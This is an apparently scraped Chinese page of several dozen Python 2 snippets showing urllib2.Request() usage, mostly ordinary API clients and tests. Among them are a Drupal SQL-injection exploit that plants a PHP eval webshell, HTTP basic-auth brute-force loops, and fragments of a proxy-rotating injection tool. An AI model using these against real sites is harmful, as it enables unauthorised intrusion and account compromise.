我们从Python开源项目中,提取了以下48个代码示例,用于说明如何使用urllib2.Request()。
def add_user_devices(self, serial): # (url, access_token, api_token) = self.get_api_conf() api_url = self.url + "/api/v1/user/devices" token = self.access_token + " " + self.api_token data = {'serial': serial} request = urllib2.Request(api_url, json.dumps(data)) request.add_header('Authorization', token) request.add_header('Content-Type', 'application/json') try: urllib2.urlopen(request) except Exception, e: print e.code print e.read() # ?????????
def remove_devices_user(self, device_list): # (url, access_token, api_token) = self.get_api_conf("conf/stf.conf", "renguoliang") for device in device_list: serial = device["serial"] api_url = self.url + "/api/v1/user/devices/%s" % serial print api_url token = self.access_token + " " + self.api_token request = urllib2.Request(api_url) request.add_header('Authorization', token) request.get_method = lambda: 'DELETE' try: urllib2.urlopen(request) except Exception, e: print e.code print e.read() # ?????????
def run(self): data = self.getData() value = { data: { "type": self.data_type } } json_data = json.dumps(value) post_data = json_data.encode('utf-8') headers = {'Content-Type': 'application/json'} try: request = urllib2.Request('{}/hippocampe/api/v1.0/{}'.format(self.url, self.service), post_data, headers) response = urllib2.urlopen(request) report = json.loads(response.read()) self.report(report) except urllib2.HTTPError: self.error("Hippocampe: " + str(sys.exc_info()[1])) except urllib2.URLError: self.error("Hippocampe: service is not available") except Exception as e: self.unexpectedError(e)
def send_result(email, result, title, urn): """ Args: email (str): address to send the results result (obj): results to send title (str): urn (str): uniform resource name Returns: str: response from endpoint """ url = 'https://mongoaud.it/results' headers = {'Content-type': 'application/json', 'Accept': 'application/json'} values = {'email': email, 'result': result, 'title': title, 'urn': urn, 'date': get_date()} try: req = urllib2.Request(url, json.dumps(values), headers) response = urllib2.urlopen(req) return response.read() except (urllib2.HTTPError, urllib2.URLError) as exc: return "Sadly enough, we are having technical difficulties at the moment, " \ "please try again later.\n\n%s" % str(exc)
def test_download_and_verify_ok(self, mock_urlopen): mock_extract_tarball = self.mock_patch_object( self.glance.utils, 'extract_tarball') mock_md5 = mock.Mock() mock_md5.hexdigest.return_value = 'expect_cksum' mock_md5_new = self.mock_patch_object( self.glance.md5, 'new', mock_md5) mock_info = mock.Mock() mock_info.getheader.return_value = 'expect_cksum' mock_urlopen.return_value.info.return_value = mock_info fake_request = urllib2.Request('http://fakeurl.com') self.glance._download_tarball_and_verify( fake_request, 'fake_staging_path') mock_urlopen.assert_called_with(fake_request) mock_extract_tarball.assert_called_once() mock_md5_new.assert_called_once() mock_info.getheader.assert_called_once() mock_md5_new.return_value.hexdigest.assert_called_once()
def test_download_ok_verify_failed(self, mock_urlopen): mock_extract_tarball = self.mock_patch_object( self.glance.utils, 'extract_tarball') mock_md5 = mock.Mock() mock_md5.hexdigest.return_value = 'unexpect_cksum' mock_md5_new = self.mock_patch_object( self.glance.md5, 'new', mock_md5) mock_info = mock.Mock() mock_info.getheader.return_value = 'expect_cksum' mock_urlopen.return_value.info.return_value = mock_info fake_request = urllib2.Request('http://fakeurl.com') self.assertRaises(self.glance.RetryableError, self.glance._download_tarball_and_verify, fake_request, 'fake_staging_path' ) mock_urlopen.assert_called_with(fake_request) mock_extract_tarball.assert_called_once() mock_md5_new.assert_called_once() mock_md5_new.return_value.hexdigest.assert_called_once()
def update(self, docs, commitwithin=None): """Post list of docs to Solr, return URL and status. Opptionall tell Solr to "commitwithin" that many milliseconds.""" url = self.url + '/update' add_xml = etree.Element('add') if commitwithin is not None: add_xml.set('commitWithin', str(commitwithin)) for doc in docs: xdoc = etree.SubElement(add_xml, 'doc') for key, value in doc.iteritems(): if value: field = etree.Element('field', name=key) field.text = (value if isinstance(value, unicode) else str(value)) xdoc.append(field) request = urllib2.Request(url) request.add_header('Content-Type', 'text/xml; charset=utf-8') request.add_data(etree.tostring(add_xml, pretty_print=True)) response = urllib2.urlopen(request).read() status = etree.XML(response).findtext('lst/int') return url, status
def _html_link_return(self, url, tag, key, value, deeper=False, second=False): """ Returns links :param url: URL to filter :param key: Name of key to search in tag :param tag: Name of value to find :param value: Name of the value expected in tag """ if url[0] == '/': url = '{0}{1}'.format(self.url, url) r = urllib2.Request(url) response = urllib2.urlopen(r) soup = BeautifulSoup(response, 'html.parser') matches = soup.findAll(tag, {key, value}) if deeper: m = matches[0] matches = m.findAll('a')[0]['href'] elif second: m = matches[0] matches = m.findAll('a')[1]['href'] print m.findAll('a') else: matches = matches[0]['href'] return '{0}{1}'.format(self.url, matches)
def execute(self): if hasattr(Context.g_module, 'publish'): Context.Context.execute(self) mod = Context.g_module rfile = getattr(self, 'rfile', send_package_name()) if not os.path.isfile(rfile): self.fatal('Create the release file with "waf release" first! %r' % rfile) fdata = Utils.readf(rfile, m='rb') data = safe_urlencode([('pkgdata', fdata), ('pkgname', mod.APPNAME), ('pkgver', mod.VERSION)]) req = Request(get_upload_url(), data) response = urlopen(req, timeout=TIMEOUT) data = response.read().strip() if sys.hexversion>0x300000f: data = data.decode('utf-8') if data != 'ok': self.fatal('Could not publish the package %r' % data)
def compute_dependencies(self, filename=REQUIRES): text = Utils.readf(filename) data = safe_urlencode([('text', text)]) if '--offline' in sys.argv: self.constraints = self.local_resolve(text) else: req = Request(get_resolve_url(), data) try: response = urlopen(req, timeout=TIMEOUT) except URLError as e: Logs.warn('The package server is down! %r' % e) self.constraints = self.local_resolve(text) else: ret = response.read() try: ret = ret.decode('utf-8') except Exception: pass self.trace(ret) self.constraints = parse_constraints(ret) self.check_errors()
def search(self, url, offset=1, maxoffset=0, title=""): current_offset = 0 data = "" self.p.reset(title=title) while current_offset <= maxoffset: self.p.rotate() temp_url = re.sub(r'\[\[OFFSET\]\]', str(current_offset), url) try: headers = { 'User-Agent' : self.user_agent } req = urllib2.Request(temp_url, None, headers) data += urllib2.urlopen(req).read() except urllib2.URLError as e: self.display.error("Could not access [%s]" % (title)) return data except Exception as e: print e current_offset += offset self.p.done() return data
def _do_trakt_auth_post(self, url, data): try: session = self.get_session() headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + session, 'trakt-api-version': '2', 'trakt-api-key': self.CLIENT_ID } # timeout in seconds timeout = 5 socket.setdefaulttimeout(timeout) request = urllib2.Request(url, data, headers) response = urllib2.urlopen(request).read() self.logger.info('Response: {0}'.format(response)) return response except urllib2.HTTPError as e: self.logger.error('Unable to submit post data {url} - {error}'.format(url=url, error=e.reason)) raise
def pContent(url): try: request_web = urllib2.Request(url);agent = 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)' request_web.add_header('User-Agent', agent);opener_web = urllib2.build_opener() text = opener_web.open(request_web).read();strreg = re.compile('(?<=href=")(.*?)(?=")') names = strreg.findall(text);opener_web.close() for name in names: if site in name or '=' in name or name.startswith('/'): global collected collected.append(name) elif site in name and EXT in name: collected.append(name) elif 'http://' in name: collected.append(name) except: pass
def GetThatShit(head_URL): source = "" global gets;global proxy_num head_URL = head_URL.replace("+",arg_eva) request_web = urllib2.Request(head_URL) request_web.add_header('User-Agent',agent) while len(source) < 1: if arg_debug == "on": print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" try: gets+=1;proxy_num+=1 source = proxy_list[proxy_num % proxy_len].open(request_web).read() except (KeyboardInterrupt, SystemExit): raise except (urllib2.HTTPError): print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" break except: print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" raise return source #the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology
def GetThatShit(head_URL): source = "" global gets;global proxy_num head_URL = head_URL.replace("+",arg_eva) request_web = urllib2.Request(head_URL) request_web.add_header('User-Agent',agent) while len(source) < 1: if arg_debug == "on": print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" try: gets+=1;proxy_num+=1 source = proxy_list[proxy_num % proxy_len].open(request_web).read() except (KeyboardInterrupt, SystemExit): raise except (urllib2.HTTPError): print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" break except: print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" raise return source #say hello
def getauth(url): req = urllib2.Request(url) try: handle = urllib2.urlopen(req) except IOError, e: pass else: print "This page isn't protected by basic authentication.\n" sys.exit(1) if not hasattr(e, 'code') or e.code != 401: print "\nThis page isn't protected by basic authentication." print 'But we failed for another reason.\n' sys.exit(1) authline = e.headers.get('www-authenticate', '') if not authline: print '\nA 401 error without a basic authentication response header - very weird.\n' sys.exit(1) else: return authline
def run(self): password = getword() try: print "-"*12 print "User:",username,"Password:",password req = urllib2.Request(sys.argv[1]) passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, sys.argv[1], username, password) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) fd = opener.open(req) print "\t\n\n[+] Login successful: Username:",username,"Password:",password,"\n" print "[+] Retrieved", fd.geturl() info = fd.info() for key, value in info.items(): print "%s = %s" % (key, value) sys.exit(2) except (urllib2.HTTPError,socket.error): pass
def getauth(url): req = urllib2.Request(url) try: handle = urllib2.urlopen(req) except IOError, e: pass else: print "This page isn't protected by basic authentication.\n" sys.exit(1) if not hasattr(e, 'code') or e.code != 401: print "\nThis page isn't protected by basic authentication." print 'But we failed for another reason.\n' sys.exit(1) authline = e.headers.get('www-authenticate', '') if not authline: print '\nA 401 error without an basic authentication response header - very weird.\n' sys.exit(1) else: return authline
def run(self): username, password = getword() try: print "-"*12 print "User:",username,"Password:",password req = urllib2.Request(sys.argv[1]) passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, sys.argv[1], username, password) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) fd = opener.open(req) print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n" print "Retrieved", fd.geturl() info = fd.info() for key, value in info.items(): print "%s = %s" % (key, value) sys.exit(2) except (urllib2.HTTPError, httplib.BadStatusLine,socket.error), msg: print "An error occurred:", msg pass
def getURLContents(self, url, data=None): "Returns the contents of the given URL as an Unicode string" s = "" success = False req = Request(url, data, {'User-agent': self.useragent}) try: f = urlopen(req) s = f.read() f.close() success = True except HTTPError, e: print 'Server error: ', e.code if (self.verbose and BaseHTTPRequestHandler.responses.has_key(e.code)): title, msg = BaseHTTPRequestHandler.responses[e.code] print title + ": " + msg except URLError, e: print 'Connection error: ', e.reason dammit = UnicodeDammit(s) return (success, dammit.unicode)
def sendRequest(self, urlString, data_ = None): try: if data_ is not None: data = urllib.urlencode(data_) request = urllib2.Request(urlString, data, headers = self.headers) else: request = urllib2.Request(urlString, headers = self.headers) response = urllib2.urlopen(request) except Exception as e: raise AfricasTalkingGatewayException(str(e)) else: self.responseCode = response.getcode() response = response.read() if self.Debug: print response return response
def getAMFRequest(self, requests): """ Builds an AMF request {LEnvelope<pyamf.remoting.Envelope>} from a supplied list of requests. """ envelope = remoting.Envelope(self.amf_version) if self.logger: self.logger.debug('AMF version: %s' % self.amf_version) for request in requests: service = request.service args = list(request.args) envelope[request.id] = remoting.Request(str(service), args) envelope.headers = self.headers return envelope
def exploit(cls, args): url = args['options']['target'] webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>' payload = "name[0;insert into menu_router (path, page_callback, access_callback, " \ "include_file, load_functions, to_arg_functions, description) values ('<" \ "?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '" \ "modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo" \ "rm_id=user_login_block" if args['options']['verbose']: print '[*] Request URL: ' + url print '[*] POST Content: ' + payload urllib2.urlopen(url, data=payload) request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);") response = urllib2.urlopen(request).read() if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response: args['success'] = True args['poc_ret']['vul_url'] = url args['poc_ret']['Webshell'] = webshell_url args['poc_ret']['Webshell_PWD'] = 'e' return args args['success'] = False return args
def retrieve_content(url, data=None): """ Retrieves page content from given URL """ try: req = urllib2.Request("".join(url[i].replace(' ', "%20") if i > url.find('?') else url[i] for i in xrange(len(url))), data, {"User-agent": NAME, "Accept-encoding": "gzip, deflate"}) resp = urllib2.urlopen(req, timeout=TIMEOUT) retval = resp.read() encoding = resp.headers.get("Content-Encoding") if encoding: if encoding.lower() == "deflate": data = StringIO.StringIO(zlib.decompress(retval, -15)) else: data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(retval)) retval = data.read() except Exception, ex: retval = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", str()) return retval or ""
def _rest_request(self, url, data, session, verb): headers = {'Content-type': 'application/json'} if session: headers["Cookie"] = "session_cookie=%s" % session LOG.debug("verb:%(verb)s url:%(url)s " "headers:%(headers)s data:%(data)s", { 'verb': verb, 'url': url, 'headers': headers, 'data': data}) request = urllib2.Request(url, data, headers) request.get_method = lambda: verb response = urllib2.urlopen(request) code = response.code result = response.read() log_result = result if len(result) > LOG_STRING_LEN: log_result = result.replace("\n", "")[:LOG_STRING_LEN] + " ..." LOG.debug("code:%(code)s result:%(result)s", {'code': code, 'result': log_result}) if code not in range(200, 300): raise BCFRestError(code=code, result=result, method=verb, url=url, data=data) return (code, result)
def respond_to_checkpoint(self, response_code): headers = { 'User-Agent': self.USER_AGENT, 'Origin': 'https://i.instagram.com', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip', 'Referer': self.endpoint, 'Cookie': self.cookie, } req = Request(self.endpoint, headers=headers) data = {'csrfmiddlewaretoken': self.csrftoken, 'response_code': response_code} res = urlopen(req, data=urlencode(data).encode('ascii'), timeout=self.timeout) if res.info().get('Content-Encoding') == 'gzip': buf = BytesIO(res.read()) content = gzip.GzipFile(fileobj=buf).read().decode('utf-8') else: content = res.read().decode('utf-8') return res.code, content
def DownloadSetting(url): list = [] try: req = urllib2.Request(url) req.add_header('User-Agent', 'VAS') response = urllib2.urlopen(req) link = response.read() response.close() xx = re.compile('<td><a href="(.+?)">(.+?)</a></td>.*?<td>(.+?)</td>', re.DOTALL).findall(link) for link, name, date in xx: print link, name, date prelink = '' if not link.startswith("http://"): prelink = url.replace('asd.php','') list.append((date, name, prelink + link)) except: print"ERROR DownloadSetting %s" %(url) return list
def _call_ACIS(self, kwargs, **moreKwargs): ''' Core method for calling the ACIS services. Returns python dictionary by de-serializing json response ''' #self._formatInputDict(**kwargs) kwargs.update(moreKwargs) self._input_dict = self._stripNoneValues(kwargs) self.url = self.baseURL + self.webServiceSource if pyVersion == 2: #python 2.x params = urllib.urlencode({'params':json.dumps(self._input_dict)}) request = urllib2.Request(self.url, params, {'Accept':'application/json'}) response = urllib2.urlopen(request) jsonData = response.read() elif pyVersion == 3: #python 3.x params = urllib.parse.urlencode({'params':json.dumps(self._input_dict)}) params = params.encode('utf-8') req = urllib.request.urlopen(self.url, data = params) jsonData = req.read().decode() return json.loads(jsonData)
def get_target(): global client, db cursor = db.Shodita.find({"bot":"Shizuka"}) for document in cursor: if check_domain_mongodb(document["ip"], document["dominio"]): print colores.verde + "[INFO] Domain: " + document["dominio"] + " already scanned" + colores.normal pass else: url = "http://" + document["dominio"] headers = {'User-Agent' : 'Mozilla 5.10'} request = Request(url, None, headers) try: response = urlopen(request, timeout=10) if response.code == 200 or response.code == "OK": html = response.read() if detect_wp(html, document["dominio"]) == True: insert_mongodb("WordPress", document["dominio"], document["ip"]) print colores.verde + "[+][INFO] " + document["dominio"] + " is WordPress" + colores.normal if detect_joomla(html): insert_mongodb("Joomla", document["dominio"], document["ip"]) print colores.verde + "[+][INFO] " + document["dominio"] + " is Joomla" + colores.normal if detect_drupal(html): insert_mongodb("Drupal", document["dominio"], document["ip"]) print colores.verde + "[+][INFO] " + document["dominio"] + " is Drupal" + colores.normal except URLError, e: continue except httplib.BadStatusLine: continue except: continue
def for_rc(): #rc = [] apiurl="https://zh.moegirl.org/api.php" format="%Y%m%d%H%M%S" utc=datetime.datetime.utcnow() rcstart=(utc-datetime.timedelta(hours=1)).strftime(format) rcend=utc.strftime(format) parmas=urllib.urlencode({'format':'json','action':'query','list':'recentchanges','rcstart':rcstart,'rcend':rcend,'rcdir':'newer','rcnamespace':'0','rctoponly':'','rctype':'edit|new','continue':'','rcprop':'title|sizes'}) req=urllib2.Request(url=apiurl,data=parmas) res_data=urllib2.urlopen(req) ori=res_data.read() rcc=json.loads(ori,object_hook=_decode_dict) rcc=OrderedDict(rcc) key = rcc['query'].keys()[0] lists = rcc['query'][key] #print type(value) #for i in range(len(value)): #rc.append(value[i]['title']) return lists
def query(self, f_table, f_keyword, f_type = None, f_netmask = None): path = "/api/%s/keyword/%s/" %(f_table, f_keyword) if f_type is not None: path = "%srtype/%s/" %(path, FLINT_TYPES[f_type]) if f_netmask is not None: path = "%smask/%s/" %(path, str(f_netmask)) #if options.source: #path = "%ssource/%s/"%(path, str(options.source)) if self.api.startswith("http://"): url = "%s%s" %(self.api, path) else: url = "http://%s%s" %(self.api, path) req = urllib2.Request(url) req = self.setup_header(req, path) return self._do_query(req, max_retry = self.MAX_RETRY)
def send_log(): ldir = options['logsfolder'] dirs = [d for d in os.listdir(ldir) if os.path.isdir(os.path.join(ldir, d))] dirs = [os.path.join(ldir, d) for d in dirs] latest_subdir = max(dirs, key=os.path.getmtime) logfolder = latest_subdir logfile = os.path.join(ldir, 'compressedlogs') shutil.make_archive(logfile, 'zip', logfolder) logfile = logfile + '.zip' log_content = open(logfile, 'rb').read() encoded_log = base64.b64encode(bytes(log_content)) data = {'encoded_log': encoded_log, 'sample_hash': options['sample_hash']} request = urllib2.Request(options['log-server-url']) request.add_header('Content-Type', 'application/json') response = urllib2.urlopen(request, json.dumps(data)) if response.getcode() != 200: print 'Unable to send data'
def process_record(self, record, dbm): if self.augment_record and dbm: record = self.get_record(record, dbm) if self.unit_system is not None: record = weewx.units.to_std_system(record, self.unit_system) url = '%s/write?db=%s' % (self.server_url, self.database) data = self.get_data(record) if weewx.debug >= 2: logdbg('url: %s' % url) logdbg('data: %s' % data) if self.skip_upload: raise AbortedPost() req = urllib2.Request(url, data) req.add_header("User-Agent", "weewx/%s" % weewx.__version__) if self.username is not None: b64s = base64.encodestring( '%s:%s' % (self.username, self.password)).replace('\n', '') req.add_header("Authorization", "Basic %s" % b64s) req.get_method = lambda: 'POST' self.post_with_retries(req)
def getHtml(url,post_data=''): ''' ??url??Html?? :param url: ??url :param post_data: post?? :return: html?? ''' if post_data and isinstance(post_data,dict): data = urllib.urlencode(post_data) req = urllib2.Request(url,post_data=data) else: req = urllib2.Request(url) try: res = urllib2.urlopen(req).read() return res except Exception,e: print( Exception,":",e)
def contact_zabbix_server(self, payload): """ Method used to contact the Zabbix server. :param payload: refers to the json message to send to Zabbix :return: returns the response from the Zabbix API """ data = json.dumps(payload) req = urllib2.Request('http://' + self.zabbix_host + '/zabbix/api_jsonrpc.php', data, {'Content-Type': 'application/json'}) f = urllib2.urlopen(req) response = json.loads(f.read()) f.close() return response
def pointer_to_json(dl_url): content_req = urllib2.Request(dl_url) content_result = urllib2.urlopen(content_req) output = content_result.read() content_result.close() oid = (re.search('(?m)^oid sha256:([a-z0-9]+)$', output)).group(1) size = (re.search('(?m)^size ([0-9]+)$', output)).group(1) json_data = ( '{"operation": "download", ' '"transfers": ["basic"], ' '"objects": [{"oid": "%s", "size": %s}]}' % (oid, size)) return json_data # the get_lfs_url function makes a request the the lfs API of the github repo, # receives a JSON response then gets the download URL from the JSON response # and returns it.
def get_lfs_url(json_input, lfs_url): req = urllib2.Request(lfs_url, json_input) req.add_header("Accept", "application/vnd.git-lfs+json") req.add_header("Content-Type", "application/vnd.git-lfs+json") result = urllib2.urlopen(req) results_python = json.load(result) file_url = results_python['objects'][0]['actions']['download']['href'] result.close() return file_url # --- section 3: actually doing stuff! --------------------- # # now the fun bit: we actually get to do stuff! # ---------------------------------------------------------- # # if the local directory doesn't exist, we make it.
def remove_device(self, serial): # (url, access_token, api_token) = self.get_api_conf("conf/stf.conf", "renguoliang") api_url = self.url + "/api/v1/user/devices/%s" % serial print api_url token = self.access_token + " " + self.api_token request = urllib2.Request(api_url) request.add_header('Authorization', token) request.get_method = lambda: 'DELETE' try: urllib2.urlopen(request) except Exception, e: print e.code print e.read() # ????????
def _query(self, path, before=None, after=None): res = [] url = '%s/lookup/%s' % (self.server, path) params = {} if self.limit: params['limit'] = self.limit if before and after: params['time_first_after'] = after params['time_last_before'] = before else: if before: params['time_first_before'] = before if after: params['time_last_after'] = after if params: url += '?{0}'.format(urllib.urlencode(params)) req = urllib2.Request(url) req.add_header('Accept', 'application/json') req.add_header('X-Api-Key', self.apikey) http = urllib2.urlopen(req) while True: line = http.readline() if not line: break yield json.loads(line)
def LoadPage(self, myUrl): user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36' accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' headers = {'User-Agent': user_agent, 'Accept': accept} print self.base_url + myUrl req = urllib2.Request(self.base_url+myUrl, headers=headers) myResponse = urllib2.urlopen(req) myPage = myResponse.read() #print myPage # encode?????unicode????????????? # decode????????????????unicode?? unicodePage = myPage.decode("gb2312", 'ignore').encode('utf-8', 'ignore') # print unicodePage return unicodePage
def linksExtractor(url, fileFormat='png'): tag = 'a' attr = 'href' if (fileFormat in ['png', 'jpg', 'jpeg', 'tiff', 'bmp', 'svg', 'gif']): tag = 'img' attr = 'src' try: headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'} req=urllib2.Request(url, None, headers) htmlDoc=urllib2.urlopen(req).read() except urllib2.HTTPError as err: print("Server Response : " + str(err.code())) return "Server refused to connect!" except urllib2.URLError: return 'Invalid URL!' page = BeautifulSoup(htmlDoc, 'html.parser') page.prettify() res = [] for link in page.find_all(tag): pre = link.get(attr) pre = str(pre) if (pre[-len(fileFormat):] == fileFormat): res.append(pre) else: pass if (len(res) < 1): return 'EMPTY' return res
def SendMessage(Token,message): url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=%s' %Token values = { "touser": "", "toparty": "2", "totag": "", "msgtype": "text", "agentid": "2", "text": { "content": message }, "safe":"0" } print values data = json.dumps(values,ensure_ascii=False) req = urllib2.Request(url, data) req.add_header('Content-Type', 'application/json') req.add_header('encoding', 'utf-8') response = urllib2.urlopen(req) result = response.read().strip() print result result = json.loads(result) if result['errmsg'] == 'ok': return 'ok' else: return 'Error'